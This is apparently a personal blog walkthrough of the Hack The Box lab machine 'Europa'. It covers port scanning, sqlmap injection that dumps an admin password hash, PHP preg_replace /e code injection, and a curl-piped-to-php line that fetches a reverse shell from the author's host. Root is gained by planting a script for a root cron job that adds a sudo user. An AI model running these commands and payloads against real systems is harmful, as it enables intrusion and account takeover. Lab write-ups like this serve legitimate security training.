30 March 2023

Pentesting Fun Stuff

following the cyber security path…

Europa

Starting with a port scan.

root@n0w4n:~# nmap -vv -n -T4 -A -sC -p- 10.10.10.22
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-06 10:35 CEST
Nmap scan report for 10.10.10.22
Host is up, received reset ttl 63 (0.025s latency).
Scanned at 2018-07-06 10:35:34 CEST for 246s
Not shown: 65532 filtered ports
Reason: 65532 no-responses
PORT    STATE SERVICE  REASON         VERSION
22/tcp  open  ssh      syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 6b:55:42:0a:f7:06:8c:67:c0:e2:5c:05:db:09:fb:78 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCh1/OK73CDKnJigk6uMUzDLSQhCHSpt9xL+SJrizWdCa7edGviU3NU/8So5xOOgzV1k8u3qHsudNnTSiH8Ek9d2c48B3xYHZn5+nPDv22fZ82LIRKd5qSLhthk91bL3uV+/CURpOZshvo0bVPS48UQaw5r7pWTE0goB+qyG2csY7hr3+9C7Sx4L/Vx7MOFuGAoy/EnpHG10f12ZJ6IVrX8mMEyZGb3Bh7crRN8tQ2RAvnJxyj+1ZeDo7Vr2F75r//dEL2iQ4S2Iuz8BocjQMREyIguIOSOJxjc/L52TpioRHnNK/aEArT02uakB4jRyd5LTSsijjitgUlAk/3H2cYd
|   256 b1:ea:5e:c4:1c:0a:96:9e:93:db:1d:ad:22:50:74:75 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEqrLpdz7aDIUDy3bslqFlbGCrL4Q6tQmesbTP73F/Rv0GO6bb3zHETnZwVB5AKes/pQdRrbDlQCtR2v2WsTXsw=
|   256 33:1f:16:8d:c0:24:78:5f:5b:f5:6d:7f:f7:b4:f2:e5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDE2hVC32u7eNINSvsmSQkbMlUkJ7s0oiG/bxPhwZb/b
80/tcp  open  http     syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
443/tcp open  ssl/http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
| ssl-cert: Subject: commonName=europacorp.htb/organizationName=EuropaCorp Ltd./stateOrProvinceName=Attica/countryName=GR/localityName=Athens/emailAddress=admin@europacorp.htb/organizationalUnitName=IT
| Subject Alternative Name: DNS:www.europacorp.htb, DNS:admin-portal.europacorp.htb
| Issuer: commonName=europacorp.htb/organizationName=EuropaCorp Ltd./stateOrProvinceName=Attica/countryName=GR/localityName=Athens/emailAddress=admin@europacorp.htb/organizationalUnitName=IT
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2017-04-19T09:06:22
| Not valid after:  2027-04-17T09:06:22
| MD5:   35d5 1c04 7ae8 0f5c 35a0 bc49 53e5 d085
| SHA-1: ced9 8f01 1228 e35d 83d3 2634 b4c1 ed52 b917 3335
| -----BEGIN CERTIFICATE-----
| MIIFSDCCA7CgAwIBAgIJAPGhMP4FtiTCMA0GCSqGSIb3DQEBCwUAMIGUMQswCQYD
| VQQGEwJHUjEPMA0GA1UECAwGQXR0aWNhMQ8wDQYDVQQHDAZBdGhlbnMxGDAWBgNV
| BAoMD0V1cm9wYUNvcnAgTHRkLjELMAkGA1UECwwCSVQxFzAVBgNVBAMMDmV1cm9w
| YWNvcnAuaHRiMSMwIQYJKoZIhvcNAQkBFhRhZG1pbkBldXJvcGFjb3JwLmh0YjAe
| Fw0xNzA0MTkwOTA2MjJaFw0yNzA0MTcwOTA2MjJaMIGUMQswCQYDVQQGEwJHUjEP
| MA0GA1UECAwGQXR0aWNhMQ8wDQYDVQQHDAZBdGhlbnMxGDAWBgNVBAoMD0V1cm9w
| YUNvcnAgTHRkLjELMAkGA1UECwwCSVQxFzAVBgNVBAMMDmV1cm9wYWNvcnAuaHRi
| MSMwIQYJKoZIhvcNAQkBFhRhZG1pbkBldXJvcGFjb3JwLmh0YjCCAaIwDQYJKoZI
| hvcNAQEBBQADggGPADCCAYoCggGBAKzVzRrrM1MSWnf8zniIPKt0SXGDB2msYUm3
| rQJ3j31wPfn9xJOWeIpBCIbtXkRqO3XGrLjG/M0Slp3sa/lQ+1dk8aupaudrJvCm
| ITzLnGvtzrtyDlPkozH2wqM+tJx351gKhfrdF81TItS8oe3yskPW3MvEDbi5lPQM
| OVZk4dhFT4l94E1zrRoapU9fqNL66BdEzeEdS6XwntdARBrEyEoCp7nFIGMBKSIn
| JzxIh2VS98ybxkw58QcDEG9ClDH49nglkKmQfAevGKil8f1f9NYRwW3YOCvuzAA7
| Osg+pLEp4de6MEf408+AOhxl4CvgZKYWvmu7b+OSrFDN8cHFy/bQ2fvrjXNazjA0
| 9FIj4wivJ7JgJOCdXEianNZkvLzqPXGS/dVUrFF5fzyG0z5xOTvABZp86fNa3yNu
| zLb04h3j04SvfJ+T3CzkZDWVsFvOYdKsce600S/iaUoqE7XQH6QPB54ba5ailVtH
| npmV1uVqVxT7tXAs0ztIDpqzJ0XAnwIDAQABo4GaMIGXMB0GA1UdDgQWBBSdw09g
| /iRsaKt8R137PRpTAfuTgTA6BgNVHREEMzAxghJ3d3cuZXVyb3BhY29ycC5odGKC
| G2FkbWluLXBvcnRhbC5ldXJvcGFjb3JwLmh0YjAfBgNVHSMEGDAWgBSdw09g/iRs
| aKt8R137PRpTAfuTgTAMBgNVHRMEBTADAQH/MAsGA1UdDwQEAwIFoDANBgkqhkiG
| 9w0BAQsFAAOCAYEAbv2ccFD/d2ovr3dkIqL1m2Qo3AgMObUaBczB37KDsB0w6lzf
| EOM/aBVth8LarblnVUJE0tk8Io7VBcTP9hF2nt3BuSM0mF6yMY3WRY+23JJpNxSO
| nOrZ1xLB7a6XTwSTWD0kg2bRbjSbiEWaUzY/RrqtCF1NThgyXo0wuMWPpPICmbd/
| 5ID8iOH+rmR3nR4fP80J38SUmvrsXAmifbsbKaKHspNMclQ2Idfiyv53xAoFrJzV
| cuxHKyBxYn8A5DPRIhbesLF2NAy0d4aziNeVgGQnSA9cV9RhN454nuzwqKb33BlF
| L8cpG59w3xR8RuyTyZql4uBPZtogzh0pc0PyxX2E2O5nbn85aqYDkVW7aUkeiU69
| LAiIp8s6Z+Rhe2rN4RAudtMcWaMTwjBOb1k1UrJ+0T7Av3O5nJk5kd/Ee5LUD2jX
| wE9Q72WLg1HP/PSSJPsNASSAW4OWSYG1CqLIhfRk5wJtfi6oR9VO+CpajWvqB0Ej
| PTXIrDgdEK1VKan9
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|   http/1.1
|_  http/1.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%), Linux 4.4 (92%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.70%E=4%D=7/6%OT=22%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=5B3F2ACC%P=x86_64-pc-linux-gnu)
SEQ(SP=106%GCD=1%ISR=10A%TI=Z%II=I%TS=8)
OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)
WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)
ECN(R=Y%DF=Y%TG=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)
T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
U1(R=N)
IE(R=Y%DFI=N%TG=40%CD=S)
Uptime guess: 1.581 days (since Wed Jul  4 20:42:20 2018)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   24.76 ms 10.10.14.1
2   24.83 ms 10.10.10.22
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 10:39
Completed NSE at 10:39, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 10:39
Completed NSE at 10:39, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 246.88 seconds
           Raw packets sent: 131237 (5.778MB) | Rcvd: 188 (13.883KB)

So there is an SSH server and a web server on ports 80 and 443. Port 443 presents a certificate, and its Subject Alternative Name lists two hostnames: www.europacorp.htb and admin-portal.europacorp.htb.
One IP address but two hostnames points to name-based virtual hosting: Apache picks the site from the Host header (and from SNI on the TLS side), so requests to the bare IP only ever reach the default page.
Grabbing the HTTP request with Burp.

GET / HTTP/1.1
Host: 10.10.10.22
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Wed, 26 Jul 2017 22:36:04 GMT
If-None-Match: "30a7-5554012ba5aba-gzip"
Cache-Control: max-age=0

And changing the Host header.

GET / HTTP/1.1
Host: admin-portal.europacorp.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Wed, 26 Jul 2017 22:36:04 GMT
If-None-Match: "30a7-5554012ba5aba-gzip"
Cache-Control: max-age=0

And as a response I get a redirect to a login page.

HTTP/1.1 302 Found
Date: Fri, 06 Jul 2018 10:11:20 GMT
Server: Apache/2.4.18 (Ubuntu)
Location: https://admin-portal.europacorp.htb/login.php
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

When I follow the redirect Burp doesn't know where to go, because it cannot resolve the hostname. Adding an entry to /etc/hosts fixes that.

10.10.10.22	admin-portal.europacorp.htb

Now I can access the admin portal.
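The Host-header trick above is easy to automate once the SAN names are known. The following is an added example, not code from the original writeup: it sends the same request to one IP with a different Host header per hostname and compares a small fingerprint (status, Location header, body length) of each answer against the bare-IP default. The two hostnames and the canned responses come from the Burp exchange above; canned_send() is a constructed stand-in for the target so the block runs offline, and tcp_sender() is the real transport, which also sets SNI to the probed name because name-based TLS virtual hosts on 443 are selected by SNI.

```python
import socket
import ssl

# Added example, not code from the original writeup. Hostnames and canned
# responses are taken from the writeup; everything else is an assumption.


def build_request(host, path='/'):
    """Minimal HTTP/1.1 request; only the Host header changes between probes."""
    return (f'GET {path} HTTP/1.1\r\n'
            f'Host: {host}\r\n'
            f'User-Agent: vhost-probe\r\n'
            f'Connection: close\r\n\r\n').encode()


def fingerprint(raw_response):
    """Reduce a raw response to (status, Location, body length): enough to tell
    one virtual host from another without diffing whole pages."""
    head, _, body = raw_response.partition(b'\r\n\r\n')
    lines = head.decode('latin-1').split('\r\n')
    status = int(lines[0].split()[1])
    location = ''
    for header in lines[1:]:
        name, _, value = header.partition(':')
        if name.strip().lower() == 'location':
            location = value.strip()
    return status, location, len(body)


def tcp_sender(ip, port=80, tls=False):
    """Real transport: connect to the IP; for TLS set SNI to the probed name."""
    def send(host, raw):
        sock = socket.create_connection((ip, port), timeout=5)
        if tls:
            ctx = ssl.create_default_context()
            ctx.check_hostname = False      # self-signed certificate on the target
            ctx.verify_mode = ssl.CERT_NONE
            sock = ctx.wrap_socket(sock, server_hostname=host)
        with sock:
            sock.sendall(raw)
            chunks = []
            while True:
                data = sock.recv(65536)
                if not data:
                    break
                chunks.append(data)
        return b''.join(chunks)
    return send


def probe_vhosts(ip, hostnames, send):
    """Return (baseline, {hostname: (fingerprint, differs_from_baseline)})."""
    baseline = fingerprint(send(ip, build_request(ip)))
    results = {}
    for host in hostnames:
        fp = fingerprint(send(host, build_request(host)))
        results[host] = (fp, fp != baseline)
    return baseline, results


# Constructed offline stand-in for the target, mirroring the responses seen in
# Burp above: only admin-portal.europacorp.htb answers differently.
def canned_send(host, raw):
    if host == 'admin-portal.europacorp.htb':
        return (b'HTTP/1.1 302 Found\r\n'
                b'Location: https://admin-portal.europacorp.htb/login.php\r\n'
                b'Content-Length: 0\r\n\r\n')
    return (b'HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n'
            b'<html>Apache2 Ubuntu Default Page: It works</html>')


SAN_HOSTS = ['www.europacorp.htb', 'admin-portal.europacorp.htb']

if __name__ == '__main__':
    # Offline demo; on the box swap canned_send for tcp_sender('10.10.10.22').
    baseline, results = probe_vhosts('10.10.10.22', SAN_HOSTS, canned_send)
    print('baseline', baseline)
    for host, (fp, differs) in results.items():
        print(f'{host:30} {fp} {"<-- distinct vhost" if differs else ""}')
```

Body length alone is a weak signal on dynamic pages; the status code and the Location header are what separate the admin portal here, since it redirects to its own login page while the other name falls through to the default site.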

Checking the page source shows a CSS file from Bootstrap. Bootstrap is a front-end CSS framework, not a CMS, so this says nothing about the back end.
Let's try to log in……..nope.
I capture the login request with Burp and feed it to sqlmap. sqlmap defaults to port 80 and doesn't find the URL, so I add ':443' to the Host header in the saved request file. The other option is sqlmap's --force-ssl flag.

root@n0w4n:~/opt/htb/europa# sqlmap -r header.txt --risk=3 --level=5 --dbs

After a while I get results.

Database: admin
Table: users
[2 entries]
+----+----------------------+--------+---------------+----------------------------------+
| id | email                | active | username      | password                         |
+----+----------------------+--------+---------------+----------------------------------+
| 1  | admin@europacorp.htb | 1      | administrator | 2b6d315337f18617ba18922c0b9597ff |
| 2  | john@europacorp.htb  | 1      | john          | 2b6d315337f18617ba18922c0b9597ff |
+----+----------------------+--------+---------------+----------------------------------+

Both accounts share the same unsalted MD5 hash, so one lookup covers both. A quick search on an online MD5 cracking site gives the plaintext.

2b6d315337f18617ba18922c0b9597ff MD5 : SuperSecretPassword!


Almost everything in the portal is inactive, except for the 'Tools' section.
Within the Tools section there is an OpenVPN Config Generator with a single input field.

"openvpn": {
        "vtun0": {
                "local-address": {
                        "10.10.10.1": "''"
                },
                "local-port": "1337",
                "mode": "site-to-site",
                "openvpn-option": [
                        "--comp-lzo",
                        "--float",
                        "--ping 10",
                        "--ping-restart 20",
                        "--ping-timer-rem",
                        "--persist-tun",
                        "--persist-key",
                        "--user nobody",
                        "--group nogroup"
                ],
                "remote-address": "ip_address",
                "remote-port": "1337",
                "shared-secret-key-file": "/config/auth/secret"
        },
        "protocols": {
                "static": {
                        "interface-route": {
                                "ip_address/24": {
                                        "next-hop-interface": {
                                                "vtun0": "''"
                                        }
                                }
                        }
                }
        }
}

What does it do? Entering 10.10.14.3 gives this:

"openvpn": {
"vtun0": {
"local-address": {
"10.10.10.1": "''"
},
"local-port": "1337",
"mode": "site-to-site",
"openvpn-option": [
"--comp-lzo",
"--float",
"--ping 10",
"--ping-restart 20",
"--ping-timer-rem",
"--persist-tun",
"--persist-key",
"--user nobody",
"--group nogroup"
],
"remote-address": "10.10.14.3",
"remote-port": "1337",
"shared-secret-key-file": "/config/auth/secret"
},
"protocols": {
"static": {
"interface-route": {
"10.10.14.3/24": {
"next-hop-interface": {
"vtun0": "''"
}
}
}
}
}
}

It replaces every 'ip_address' with the value I supplied (in this case 10.10.14.3). Can I abuse this? Let's run it through Burp again.

POST /tools.php HTTP/1.1
Host: admin-portal.europacorp.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://admin-portal.europacorp.htb/tools.php
Cookie: PHPSESSID=53pne4hhcormh5obflmmonjvb4
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 1688
pattern=%2Fip_address%2F&ipaddress=10.10.14.3&text=%22openvpn%22%3A+%7B%0D%0A++++++++%22vtun0%22%3A+%7B%0D%0A++++++++++++++++%22local-address%22%3A+%7B%0D%0A++++++++++++++++++++++++%2210.10.10.1%22%3A+%22%27%27%22%0D%0A++++++++++++++++%7D%2C%0D%0A++++++++++++++++%22local-port%22%3A+%221337%22%2C%0D%0A++++++++++++++++%22mode%22%3A+%22site-to-site%22%2C%0D%0A++++++++++++++++%22openvpn-option%22%3A+%5B%0D%0A++++++++++++++++++++++++%22--comp-lzo%22%2C%0D%0A++++++++++++++++++++++++%22--float%22%2C%0D%0A++++++++++++++++++++++++%22--ping+10%22%2C%0D%0A++++++++++++++++++++++++%22--ping-restart+20%22%2C%0D%0A++++++++++++++++++++++++%22--ping-timer-rem%22%2C%0D%0A++++++++++++++++++++++++%22--persist-tun%22%2C%0D%0A++++++++++++++++++++++++%22--persist-key%22%2C%0D%0A++++++++++++++++++++++++%22--user+nobody%22%2C%0D%0A++++++++++++++++++++++++%22--group+nogroup%22%0D%0A++++++++++++++++%5D%2C%0D%0A++++++++++++++++%22remote-address%22%3A+%22ip_address%22%2C%0D%0A++++++++++++++++%22remote-port%22%3A+%221337%22%2C%0D%0A++++++++++++++++%22shared-secret-key-file%22%3A+%22%2Fconfig%2Fauth%2Fsecret%22%0D%0A++++++++%7D%2C%0D%0A++++++++%22protocols%22%3A+%7B%0D%0A++++++++++++++++%22static%22%3A+%7B%0D%0A++++++++++++++++++++++++%22interface-route%22%3A+%7B%0D%0A++++++++++++++++++++++++++++++++%22ip_address%2F24%22%3A+%7B%0D%0A++++++++++++++++++++++++++++++++++++++++%22next-hop-interface%22%3A+%7B%0D%0A++++++++++++++++++++++++++++++++++++++++++++++++%22vtun0%22%3A+%22%27%27%22%0D%0A++++++++++++++++++++++++++++++++++++++++%7D%0D%0A++++++++++++++++++++++++++++++++%7D%0D%0A++++++++++++++++++++++++%7D%0D%0A++++++++++++++++%7D%0D%0A++++++++%7D%0D%0A%7D%0D%0A++++++++++++++++++++++++++++++++

Mostly URL encoded. Decoding in Burp is easy.

pattern=/ip_address/&ipaddress=10.10.14.3&text="openvpn": {
        "vtun0": {
                "local-address": {
                        "10.10.10.1": "''"
                },
                "local-port": "1337",
                "mode": "site-to-site",
                "openvpn-option": [
                        "--comp-lzo",
                        "--float",
                        "--ping 10",
                        "--ping-restart 20",
                        "--ping-timer-rem",
                        "--persist-tun",
                        "--persist-key",
                        "--user nobody",
                        "--group nogroup"
                ],
                "remote-address": "ip_address",
                "remote-port": "1337",
                "shared-secret-key-file": "/config/auth/secret"
        },
        "protocols": {
                "static": {
                        "interface-route": {
                                "ip_address/24": {
                                        "next-hop-interface": {
                                                "vtun0": "''"
                                        }
                                }
                        }
                }
        }
}

So the PHP code replaces every match of a user-supplied pattern with a user-supplied value in a user-supplied subject. A quick search shows that this is the signature of preg_replace().
preg_replace() searches the subject for matches of a PCRE pattern and replaces them with the replacement string. The pattern carries a set of modifier letters after its closing delimiter, and one of them stands out: the /e modifier, deprecated in PHP 5.5 and removed in PHP 7.0 because of its security impact. The recommended replacement is preg_replace_callback().
Why is this modifier so bad? With /e set, preg_replace() first substitutes backreferences into the replacement string, then evaluates the result as PHP code and uses the return value as the replacement. Single quotes, double quotes, backslashes and NUL bytes in the substituted backreferences are escaped with backslashes, but that only covers the backreferences; the replacement string itself is evaluated as written. Here the pattern comes straight from the POST body, so I can append the e modifier myself, and the replacement is mine as well, so the server ends up running arbitrary PHP. One caveat: this only works while the box runs a PHP 5.x interpreter; on PHP 7 the e modifier is rejected with a warning and preg_replace() returns NULL.
Let’s see if commands will be executed.

Looks like the commands are executed just nicely.
Now let's get a shell. For this I use one of my favorites, the pentestmonkey php-reverse-shell, edited to point back to my IP and port.
Setting up the listener.

root@n0w4n:~/opt/htb/europa# nc -lvnp 31337
listening on [any] 31337 ...

In the same Repeater window in Burp I change the pattern to /ip_address/e and put the PHP to run in the replacement field. Every match of ip_address then evaluates system(), which pulls shell.php from my web server and pipes it into php:

pattern=/ip_address/e&ipaddress=system('curl http://10.10.14.3:8000/shell.php | php;')&text="openvpn": {

The download shows up on my web server.

root@n0w4n:~/opt/htb/europa# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
10.10.10.22 - - [06/Jul/2018 14:50:26] "GET /shell.php HTTP/1.1" 200 -

And I have a working shell.

root@n0w4n:~/opt/htb/europa# nc -lvnp 31337
listening on [any] 31337 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.22] 41852
Linux europa 4.4.0-81-generic #104-Ubuntu SMP Wed Jun 14 08:17:06 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 15:53:06 up 7 min,  0 users,  load average: 0.00, 0.06, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Because this is a temporary shell I wanted to drop a more permanent one that I could execute from the /var/www/admin folder, but that folder is not writable by www-data.
One level up I noticed a /var/www/cmd and a /var/www/cronjobs folder. /cmd was empty, but inside /cronjobs there was a file named clearlogs:

#!/usr/bin/php
<?php
$file = '/var/www/admin/logs/access.log';
file_put_contents($file, '');
exec('/var/www/cmd/logcleared.sh');
?>

For the enumeration part I uploaded the LinEnum script and ran it from /tmp.

[-] It looks like we have some admin users:
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=1000(john) gid=1000(john) groups=1000(john),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare)
...
[-] Contents of /etc/passwd:
john:x:1000:1000:John Makris,,,:/home/john:/bin/bash
...
[-] Are permissions on /home directories lax:
total 12K
drwxr-xr-x 3 root root 4.0K Apr 18 2017 .
drwxr-xr-x 23 root root 4.0K Jun 23 2017 ..
drwxr-xr-x 4 john john 4.0K Jun 23 2017 john
[-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/tmux
/usr/bin/screen
[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * *	root	/var/www/cronjobs/clearlogs

Here is the cron job from earlier: it runs every minute, as root.
The LinEnum output also showed that /home/john is world-readable, so let's have a look for a flag.

$ cd /home/john
$ ls -lah
total 40K
drwxr-xr-x 4 john john 4.0K Jun 23  2017 .
drwxr-xr-x 3 root root 4.0K Apr 18  2017 ..
-rw------- 1 john john    1 Dec 24  2017 .bash_history
-rw-r--r-- 1 john john  220 Apr 18  2017 .bash_logout
-rw-r--r-- 1 john john 3.7K Apr 18  2017 .bashrc
drwx------ 2 john john 4.0K Apr 18  2017 .cache
drwxrwxr-x 2 john john 4.0K Apr 18  2017 .nano
-rw-r--r-- 1 john john  655 Apr 18  2017 .profile
-rw------- 1 root root 1.0K Apr 19  2017 .rnd
-rw-r--r-- 1 john john    0 Apr 18  2017 .sudo_as_admin_successful
-r--r--r-- 1 root john   33 Jun 23  2017 user.txt
$ cat user.txt
2f8d40cc05295154a9c3452c19ddc221

Now for the elevated rights and the final flag. The clearlogs script exec's /var/www/cmd/logcleared.sh, which does not exist, and cron runs clearlogs as root every minute. If www-data can write to /var/www/cmd, I can create that file myself and root will run it.

$ cd /var/www/cmd
$ ls -lah
total 8.0K
drwxrwxr-x 2 root www-data 4.0K May 12  2017 .
drwxr-xr-x 6 root root     4.0K May 12  2017 ..
$ echo -ne "#!/bin/bash\ntouch /tmp/test.txt" > logcleared.sh
$ ls -lah
total 12K
drwxrwxr-x 2 root     www-data 4.0K Jul  6 16:58 .
drwxr-xr-x 6 root     root     4.0K May 12  2017 ..
-rw-rw-rw- 1 www-data www-data   36 Jul  6 16:58 logcleared.sh
$ chmod +x logcleared.sh
$ ls -lah /tmp
total 36K
drwxrwxrwt 9 root root 4.0K Jul 6 16:59 .
drwxr-xr-x 23 root root 4.0K Jun 23 2017 ..
drwxrwxrwt 2 root root 4.0K Jul 6 16:52 .ICE-unix
drwxrwxrwt 2 root root 4.0K Jul 6 16:52 .Test-unix
drwxrwxrwt 2 root root 4.0K Jul 6 16:52 .X11-unix
drwxrwxrwt 2 root root 4.0K Jul 6 16:52 .XIM-unix
drwxrwxrwt 2 root root 4.0K Jul 6 16:52 .font-unix
drwx------ 3 root root 4.0K Jul 6 16:52 systemd-private-b62d0155be1d4db89f375b92afe80b91-systemd-timesyncd.service-LsnZ9N
-rw-r--r-- 1 root root 0 Jul 6 16:59 test.txt
drwx------ 2 root root 4.0K Jul 6 16:52 vmware-root

Looks like that worked: /tmp/test.txt is owned by root, so the cron job ran my script. Now for some better content.

$ echo -ne "\nuseradd -m n0w4n" >> logcleared.sh
$ echo "echo 'n0w4n:password1' | chpasswd" >> logcleared.sh
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
john:x:1000:1000:John Makris,,,:/home/john:/bin/bash
n0w4n:x:1001:1001::/home/n0w4n:
$ echo "usermod -aG sudo n0w4n" >> logcleared.sh

That went well. Note that useradd without -s leaves the shell field in /etc/passwd empty, which is why the login below lands in a plain sh prompt.

root@n0w4n:~/opt/htb/europa# ssh n0w4n@10.10.10.22
n0w4n@10.10.10.22's password:
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-81-generic x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Fri Jul  6 17:09:50 2018 from 10.10.14.3
$ id
uid=1001(n0w4n) gid=1001(n0w4n) groups=1001(n0w4n),27(sudo)
$ sudo -i
[sudo] password for n0w4n:
root@europa:~# cd /root
root@europa:~# ls -lah
total 32K
drwx------  4 root root 4.0K Jun 23  2017 .
drwxr-xr-x 23 root root 4.0K Jun 23  2017 ..
-rw-------  1 root root    1 Dec 24  2017 .bash_history
-rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
drwx------  2 root root 4.0K May 12  2017 .cache
drwxr-xr-x  2 root root 4.0K Apr 19  2017 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
